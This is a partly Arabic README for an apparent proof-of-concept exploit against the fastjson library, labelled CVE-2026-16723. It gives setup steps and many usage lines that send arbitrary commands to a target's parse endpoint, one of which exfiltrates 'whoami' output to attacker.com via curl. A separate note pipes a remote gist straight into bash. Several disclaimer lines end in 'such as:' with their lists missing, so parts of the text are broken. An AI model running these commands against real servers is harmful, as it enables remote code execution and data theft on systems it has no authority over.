
ادعم صيانة هذا المشروع عبر PayPal أو بمسح رمز الاستجابة السريعة (QR) أدناه.
استخدم هذا المشروع فقط في بيئات آمنة ومصرّح بها، مثل:
مثال على الإعداد:
git clone https://github.com/HORKimhab/CVE-2026-16723
cd CVE-2026-16723
# Download fastjson JAR (optional - script will auto-download)
wget https://repo1.maven.org/maven2/com/alibaba/fastjson/1.2.83/fastjson-1.2.83.jar
# Project use python follow below
# Create a virtual environment
python -m venv venv
# Activate the virtual environment
# macOS / Linux
source venv/bin/activate
# Windows (Git Bash / WSL)
source venv/Scripts/activate
# Install requirments
pip install -r requirements.txt
مثال على الاستخدام:
# Basic exploit
python CVE-2026-16723.py -t http://localhost:8080/parse
# Custom command
python CVE-2026-16723.py -t http://localhost:8080/parse -c "id > /tmp/result"
# With custom IP and port
python CVE-2026-16723.py -t http://localhost:8080/parse -c "whoami" --remote-ip 192.168.1.100 --port 9000
# HTTPS target
python CVE-2026-16723.py -t https://target.com/api/parse -c "curl http://attacker.com/$(whoami)" --insecure
# Using proxy
python CVE-2026-16723.py -t http://localhost:8080/parse --proxy http://127.0.0.1:8080
# Custom FD range
python CVE-2026-16723.py -t http://localhost:8080/parse --fd-range 10-50
# Quiet mode
python CVE-2026-16723.py -t http://localhost:8080/parse --quiet
ملاحظة:
curl -fsSL https://gist.githubusercontent.com/HORKimhab/24c89ee9a86a42aac88381334f8bfe48/raw | bash -s -- -y لمسح مجلد .git المتداخلمستودع لتعلّم واختبار والبحث في مفاهيم الأمن السيبراني في بيئات خاضعة للتحكم.
هذا المستودع لأغراض البحث الأمني التعليمي والمصرّح به فقط.
وهو مصمم لمساعدة المستخدمين على التعلّم حول:
استخدم هذا المستودع فقط في البيئات التي تملك الإذن باستخدامها، مثل:
الاستخدام غير المصرّح به أو غير القانوني محظور تمامًا.
المؤلف والمساهمون ليسوا مسؤولين عن أي ضرر أو إساءة استخدام أو قضايا قانونية أو خسائر ناتجة عن هذا المشروع.
باستخدامك لهذا المستودع، فإنك توافق على أن:
هذا المشروع مخصص لـ:
يُرجى اتباع ممارسات الإفصاح المسؤول والامتثال لجميع القوانين المعمول بها.
للإفصاح المسؤول أو التعاون، تواصل مع القائم على صيانة المستودع عبر GitHub.